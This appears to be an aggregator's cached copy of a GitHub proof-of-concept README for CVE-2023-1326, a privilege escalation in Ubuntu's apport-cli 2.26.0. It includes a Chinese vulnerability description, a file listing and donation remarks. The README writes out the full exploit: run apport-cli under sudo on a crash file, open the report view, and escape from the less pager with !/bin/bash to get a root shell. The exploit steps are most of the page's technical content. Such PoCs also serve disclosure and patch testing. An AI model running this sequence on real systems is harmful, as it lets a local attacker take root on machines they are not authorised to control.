CVE-2023-1326 PoC — Apport 安全漏洞

Source

https://github.com/Pol-Ruiz/CVE-2023-1326

Associated Vulnerability

Title:Apport 安全漏洞 (CVE-2023-1326)
Description:Canonical Apport是英国科能软件（Canonical）公司的一款用于收集并反馈错误信息（当应用程序崩溃时操作系统认为有用的信息）的工具包。 Apport 2.26.0及之前版本存在安全漏洞，该漏洞源于存在特权升级漏洞，攻击者利用该漏洞可以提升权限。

Description

Esto es una prueba de concepto propia i basica de la vulneravilidad CVE-2023-1326

Readme

# CVE-2023-1326
A proof of concept for CVE-2023–1326 in apport-cli 2.26.0

This vulnerability is privilege escalation in apport-cli 2.26.0, similar to CVE-2023–26604, this vulnerability only works if assign in sudoers:

![image](https://github.com/diego-tella/CVE-2023-1326-PoC/assets/70545257/983d4307-e3af-46db-8d76-5e3970f10225)

A privilege escalation attack was found in apport-cli 2.26.0 and earlier which is similar to CVE-2023-26604. If a system is specially configured to allow unprivileged users to run sudo apport-cli, less is configured as the pager, and the terminal size can be set: a local attacker can escalate privilege.

# PoC
```
sudo /usr/bin/apport-cli -c /var/crash/some_crash_file.crash
press V (view report)
!/bin/bash
```
![image](https://github.com/diego-tella/CVE-2023-1326-PoC/assets/70545257/aa702438-28fe-434c-9ea5-6ed760f956bb)
![image](https://github.com/diego-tella/CVE-2023-1326-PoC/assets/70545257/fa2d0491-35be-465f-8e7b-35024faf8dcf)

File Snapshot


 [4.0K]  /data/pocs/93db69700b7a70f8eb3094a600665a8cd450defd
├── [ 34K]  LICENSE.md
└── [ 975]  README.md

0 directories, 2 files

Shenlong Bot has cached this for you

Remarks

1. It is advised to access via the original source first.

2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).

3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.

Goal Reached Thanks to every supporter — we hit 100%!